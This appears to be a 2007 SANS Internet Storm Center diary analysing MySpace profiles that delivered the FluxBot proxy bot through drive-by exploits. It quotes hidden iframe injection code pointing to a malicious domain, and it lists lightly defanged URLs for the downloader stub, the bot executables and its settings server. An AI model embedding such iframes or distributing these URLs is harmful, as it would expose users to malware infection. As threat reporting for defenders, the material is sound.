MySpace Flux Malware

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive by exploits.  The exploits will install a version of "flux bot", a very popular proxy network bot.

  FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex ever changing networks of proxy servers. A system infected with FluxBot will be used a one of these proxies.

  Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

  A typical excerpt from an infected profile (obfuscated to protect the innocent): 


<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken."><img

   The actual exploit / malware is served via an existing flux network. * will redirect the user to an encoded javascript which decodes to:

    <iframe src="http://fafb4c4c .com/header_03.gif" width=1
   The domain used here is of course again served via flux. header_03.gif


    <iframe src="http://fafb4c4c .com/routine.php" width=1

   Are we there yet? yup. just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:

http://fafb4c4c .com/session.exe (this is just the downloader stub)

The downloader will now retrieve the actual bot. We have seen among others these

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe

Settings for the bot can be found here:

http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe

once its all set and done, you will be a proud new member of the flux net and soon you
will find your system to participate in phishing and similar endevours.

Couple IPs that may be worthwhile to block:

AS13767   | 
AS15083   |
AS25761   |    
AS25761   |   

As you can imagine, its a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.




I will be teaching next: Intrusion Detection In-Depth - SANS Cyber Safari 2022


4597 Posts
ISC Handler
Jun 26th 2007

Sign Up for Free or Log In to start participating in the conversation!